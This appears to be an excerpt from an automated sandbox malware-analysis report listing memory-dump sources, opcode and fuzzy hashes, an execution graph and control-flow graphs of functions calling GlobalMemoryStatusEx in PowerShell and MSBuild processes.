                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1372112356.00007FFC3DB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DB10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffc3db10000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6c5e6dd197a159a80acd7f708083a50707aad81427033c48cb309c12c20a5ea8
                                                  • Instruction ID: dd69811bf70aaad6b18bc2d9ab5c309c82ca720af2bee512f4f824ac49001e5d
                                                  • Opcode Fuzzy Hash: 6c5e6dd197a159a80acd7f708083a50707aad81427033c48cb309c12c20a5ea8
                                                  • Instruction Fuzzy Hash: F031EB52E2EAAF4FFAA9D2A904651BC56D1EF5529471800BAC40DC31D3FC0C9C59E3A3
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1372112356.00007FFC3DB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DB10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffc3db10000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9f2925dea9fd3c540805948eebbbda05e92c36e679a61e1f9d1db826efdafa96
                                                  • Instruction ID: 38bb1a0028eddbcd794c979931d35beef043b6e1b129041743357ce3fc704fd9
                                                  • Opcode Fuzzy Hash: 9f2925dea9fd3c540805948eebbbda05e92c36e679a61e1f9d1db826efdafa96
                                                  • Instruction Fuzzy Hash: E501D622F0D93E0AFAA5D29D20542B892C2DFE8EE4F440176C40DD328DFD189C09A6D1
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1371529451.00007FFC3DA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DA40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffc3da40000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7b26c731aaab75d51fe5d9e46a495a706df9f0b7e692b1c878dc6014b7411961
                                                  • Instruction ID: fc7a4b59d4201364bdb3d30607e6665f0f3980f60867fe0ee32dd75990e890bc
                                                  • Opcode Fuzzy Hash: 7b26c731aaab75d51fe5d9e46a495a706df9f0b7e692b1c878dc6014b7411961
                                                  • Instruction Fuzzy Hash: 6F01D63095891D4FE394EB2CD4593B9B3E1FF98342F10057EE84DC32A5EE6A6881C751
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1371529451.00007FFC3DA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DA40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffc3da40000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                  • Instruction ID: 7444b6609f28087d910808c231d144f218f7a854408e8b7b37039d44acc4d915
                                                  • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                  • Instruction Fuzzy Hash: 5501A73110CB0C8FD744EF0CE051AB5B7E0FB85360F10052DE58AC3661DA36E882CB41

                                                  Non-executed Functions

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1371529451.00007FFC3DA40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DA40000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffc3da40000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 7>)$(7>)$07>)$87>)$@7>)$H7>)$P7>)
                                                  • API String ID: 0-2296636642
                                                  • Opcode ID: 1d71aa07538d46506544543b52311913fc4dbbaf4fc474a7f6ed277cbf3e74ce
                                                  • Instruction ID: c3ce7c0008c19445765d29f354576816aa6c130a1a1a3a8c4a87b06957629ae3
                                                  • Opcode Fuzzy Hash: 1d71aa07538d46506544543b52311913fc4dbbaf4fc474a7f6ed277cbf3e74ce
                                                  • Instruction Fuzzy Hash: D1413070618A6ACFE709DB6C9050764BFE5DF56740B9401E5E04CCB2D3EDA8AC42C775

                                                  Execution Graph

                                                  Execution Coverage:12%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:46
                                                  Total number of Limit Nodes:5
                                                  execution_graph 11948 15818e0 11949 15818e4 11948->11949 11952 1581b78 11949->11952 11958 1581a61 11949->11958 11953 1581b4f 11952->11953 11954 1581ba1 11953->11954 11964 1582018 11953->11964 11968 1581fbd 11953->11968 11972 158200a 11953->11972 11954->11949 11960 1581a9c 11958->11960 11959 1581ba1 11959->11949 11960->11959 11961 1582018 GlobalMemoryStatusEx 11960->11961 11962 158200a GlobalMemoryStatusEx 11960->11962 11963 1581fbd GlobalMemoryStatusEx 11960->11963 11961->11960 11962->11960 11963->11960 11965 1582021 11964->11965 11976 1582a38 11965->11976 11966 158211e 11966->11966 11969 1581fc4 11968->11969 11971 1582a38 GlobalMemoryStatusEx 11969->11971 11970 158211e 11970->11970 11971->11970 11973 1582021 11972->11973 11975 1582a38 GlobalMemoryStatusEx 11973->11975 11974 158211e 11974->11974 11975->11974 11978 1582a26 11976->11978 11977 1582b5e 11977->11966 11978->11976 11978->11977 11982 1587b10 11978->11982 11986 1587b00 11978->11986 11979 1582f02 11979->11966 11983 1587b35 11982->11983 11990 1587da2 11983->11990 11984 1587b97 11984->11979 11987 1587b35 11986->11987 11989 1587da2 GlobalMemoryStatusEx 11987->11989 11988 1587b97 11988->11979 11989->11988 11994 1587dd8 11990->11994 11999 1587de8 11990->11999 11991 1587dbe 11991->11984 11995 1587dec 11994->11995 11996 1587df5 11995->11996 12004 158776c 11995->12004 11996->11991 12000 1587e1d 11999->12000 12001 1587df5 11999->12001 12002 158776c GlobalMemoryStatusEx 12000->12002 12001->11991 12003 1587e3a 12002->12003 12003->11991 12005 1587773 GlobalMemoryStatusEx 12004->12005 12007 1587e3a 12005->12007 12007->11991

                                                  Executed Functions

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1307 15877ca-15877cc 1308 158782c-1587834 1307->1308 1309 15877ce-15877d3 1307->1309 1310 15877e6-15877e8 1308->1310 1311 1587836-15878b8 1308->1311 1309->1310 1312 15877ea-15877eb 1310->1312 1313 1587773 1310->1313 1315 1587ec0-1587efe 1311->1315 1312->1308 1313->1315 1316 1587f06-1587f34 GlobalMemoryStatusEx 1315->1316 1317 1587f3d-1587f65 1316->1317 1318 1587f36-1587f3c 1316->1318 1318->1317
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3713110315.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_1580000_MSBuild.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 645a6381ecb637d66741e602ef76fe6cac3ae6c20b38cf46646a7a8550d0e836
                                                  • Instruction ID: dc2273c139b0a5a208bb9583e6aa20ed5458b56d69d9b106900b4d11ddca98df
                                                  • Opcode Fuzzy Hash: 645a6381ecb637d66741e602ef76fe6cac3ae6c20b38cf46646a7a8550d0e836
                                                  • Instruction Fuzzy Hash: 0A21A9B2C14659DBCB10DFAAC845BAEBBF4FB48310F24845AD418BB241D339A505CFA2

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1321 158776c-1587f34 GlobalMemoryStatusEx 1325 1587f3d-1587f65 1321->1325 1326 1587f36-1587f3c 1321->1326 1326->1325
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,01587E3A), ref: 01587F27
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3713110315.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_1580000_MSBuild.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  • Opcode ID: 4dc5600fec7e2027649c8a52fd9da617a7a10893b6502f3b915e739c172faa33
                                                  • Instruction ID: 9f8f2cadcfcdb1ca1441d8de7acb729fc0866b5ebc26824d86fe1dcdb2452e66
                                                  • Opcode Fuzzy Hash: 4dc5600fec7e2027649c8a52fd9da617a7a10893b6502f3b915e739c172faa33
                                                  • Instruction Fuzzy Hash: 8E1144B1C1065A9FCB10DF9AD444BDEFBF4FB48210F11852AE818B7240D378A901CFA1

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1329 1587eba-1587efe 1330 1587f06-1587f34 GlobalMemoryStatusEx 1329->1330 1331 1587f3d-1587f65 1330->1331 1332 1587f36-1587f3c 1330->1332 1332->1331
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,01587E3A), ref: 01587F27
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3713110315.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_1580000_MSBuild.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  • Opcode ID: 0f82d249790645fdc7811274227fc856046803f5ce29aee9704eb2847946488b
                                                  • Instruction ID: 3435bd1be2e66673794dec26125170d14611d54b053eeb81a7c3283ef5c5bd24
                                                  • Opcode Fuzzy Hash: 0f82d249790645fdc7811274227fc856046803f5ce29aee9704eb2847946488b
                                                  • Instruction Fuzzy Hash: 5B1122B1C0066A9FDB10CF9AD444B9EFBF0BF48210F11816AD818B7240D378A955CFA1
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3712590844.000000000149D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0149D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_149d000_MSBuild.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 034cedd4e7585b5033c34519bd32b83665df4632f28946db626b5512472745b1
                                                  • Instruction ID: 1b2a28ba50e013c786b4bdb8986edc110102c1ffb7ec33292952bc4a0ea205d9
                                                  • Opcode Fuzzy Hash: 034cedd4e7585b5033c34519bd32b83665df4632f28946db626b5512472745b1
                                                  • Instruction Fuzzy Hash: 45210371904204EFDF15DF94D9C0B57BF65FB88310F24C1BAE9090A266C33AE856CAA2
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3712590844.000000000149D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0149D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_149d000_MSBuild.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a0ffab5f0a75abba76e46da30f4106ab1a9b5d88ed3f9b00d643379fe76b32b3
                                                  • Instruction ID: 0fe85d43b5e2efb9c87e7da93653905ba3954961e3532070748f889b30fa1dca
                                                  • Opcode Fuzzy Hash: a0ffab5f0a75abba76e46da30f4106ab1a9b5d88ed3f9b00d643379fe76b32b3
                                                  • Instruction Fuzzy Hash: D211DF72804240DFCF16CF54D9C4B5ABF61FB84320F24C1AAD8090B267C33AE456CBA1